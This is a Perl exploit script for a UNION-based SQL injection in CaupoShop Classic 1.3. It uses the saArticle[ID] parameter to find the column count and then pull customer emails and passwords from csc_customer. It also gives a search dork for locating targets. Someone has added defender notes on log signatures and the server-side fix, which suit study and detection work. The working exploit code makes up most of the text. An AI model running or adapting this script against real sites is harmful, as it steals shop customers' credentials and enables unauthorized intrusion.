1 #!/usr/bin/perl
2 ######################
3 #
4 #CaupoShop Classic 1.3 Remote Exploit
5 #
6 ######################
7 #
8 #Bug by: h0yt3r
9 #
10 #Dork: inurl:csc_article_details.php
11 # Couldnt find a stable dork for this specific Version.
12 #Exploit will only work on correct version.
13 #
14 ##
15 ###
16 ##
17 #
18 #I found this long time ago but never actually shared it.
19 #As the userid’s are a bit messy you will only get the top 1 row value.
20 #Change it if you like.
21 #
22 #Gr33tz go to:
23 #thund3r, ramon, b!zZ!t, Free−Hack, Sys−Flaw and of course the pwning h4ck−y0u Team
24 ########
25
# Setup and reachability check for the CaupoShop Classic 1.3 proof of concept.
# This part only builds the target URL from the two command-line arguments
# and confirms that csc_article_details.php answers before anything else runs.
#
# Defender notes:
#  - No User-Agent is set in the visible code, so requests carry LWP's default
#    "libwww-perl/<version>" string; that is a cheap signal in access logs.
#  - The first request is a GET for csc_article_details.php with an empty
#    query string ("?" and nothing after it), which a normal shop visitor
#    would rarely produce.
26 use LWP::UserAgent;
27 my $userAgent = LWP::UserAgent−>new;
28
# usage() is not defined in this part of the listing (presumably further down
# the file); it is called unconditionally, before the arguments are read.
29 usage();
30
# Host and path prefix come straight from the command line. They are package
# globals (no "my"; no "use strict" is visible) and are not validated.
31 $server = $ARGV[0];
32 $dir = $ARGV[1];
33
34 print"\n";
# Only $dir is tested, and by truthiness: a missing second argument, an empty
# string or "0" all end the run here.
35 if (!$dir) { die "Read Usage!\n"; }
36
# The URL is plain concatenation: http:// + host + directory + script + "?".
# The scheme is fixed to HTTP; $dir must already carry its own slashes.
37 $filename ="csc_article_details.php";
38 my $url = "http://".$server.$dir.$filename."?";
39
# Probe request with no parameters. is_success is true for 2xx responses only,
# so anything else (redirect left unfollowed, 403, 404, 5xx) aborts the script.
40 my $Attack= $userAgent−>get($url);
41 if ($Attack−>is_success)
42 {
43 print "[x] Attacking ".$url."\n";
44 }
45 else
46 {
47 print "Couldn’t connect to ".$url."!";
48 exit;
49 }
50
51 print "[x] Injecting Black Magic\n";
52
CaupoShop Classic 1.3 saArticleID Remote SQL Injection Vulnerability
06/19/2008
# UNION-based SQL injection through the saArticle[ID] query parameter of
# csc_article_details.php, in two phases: (1) find how many columns the
# page's query returns, (2) read email and password from csc_customer.
#
# What this implies about the application (inferred from the requests, the
# server code is not shown): the ID value reaches a SQL statement without
# being forced to an integer or bound as a parameter. The fix on the server
# side is to cast/validate the ID as an integer or use prepared statements.
#
# Detection notes for this exact script:
#  - query strings on csc_article_details.php containing "union select",
#    the table name "csc_customer", or the literal markers 66666 / 1337
#    (spaces and brackets may appear percent-encoded in logs);
#  - a negative article ID (the "−275" and "−1" values below);
#  - a burst of up to 93 near-identical requests from one client whose
#    column list grows by one ",66666" each time.

# Marker value that should show up in the rendered page once the injected
# SELECT has the same number of columns as the original query.
53 my @count = ("66666");
54
# Column-count probe. $i is only a loop counter (6..98, so at most 93 tries)
# and is never used in the body. The first request selects five columns
# (1,2,3,4,66666); every miss appends one more ",66666".
55 for ($i = 6; $i<99; $i++)
56 {
# @count is interpolated into the string, so its elements are joined with the
# list separator (a space by default), e.g. "66666 ,66666 ,66666".
57 my $selectUrl = $url."saArticle[ID]=−275 union select 1,2,3,4, @count";
58 my $Attack= $userAgent−>get($selectUrl);
# The bare number is used as a pattern: any occurrence of "66666" anywhere in
# the response body counts as a hit, including one unrelated to the query.
59 if($Attack−>content =~ 66666)
60 { last; }
61 else
62 { push(@count,",66666"); }
63 }
64
# Extraction request. No check is made that the probe above actually matched;
# if it never did, this runs with whatever @count holds after the last try.
# The fourth column is replaced by concat(1337,email,0x3a,password,1337):
# 0x3a is ":", and the 1337 markers delimit the value in the returned HTML.
65 my $Final = $url."saArticle[ID]=−1 union select 1,2,3,concat(1337,email,0x3a,password,1337), @count from csc_customer";
66
67 my $Attack= $userAgent−>get($Final);
68
# Non-greedy, case-insensitive match: only the first marker-delimited pair in
# the response is captured ($1 = email column, $2 = password column).
69 if($Attack−>content =~ m/1337(.*?):(.*?)1337/i)
70 {
71 my $login = $1;
72 my $pass = $2;
73 print "[x] Success!\n";
74 print "[x] Top 1 User Details:\n";
75
# "Username" is the value of the email column. Whether the password column
# holds a hash or cleartext cannot be told from this listing; either way the
# exposed account should be treated as compromised and its password reset.
76 print " Username: ".$login."\n";
77 print " Password: ".$pass."\n";
78 }
79 else
80 {
# Reached when the markers are absent from the response, e.g. on a version
# or schema where the injected query does not render.
81 print"[x] Something wrong...Version?\n";
82 exit;
83
84 }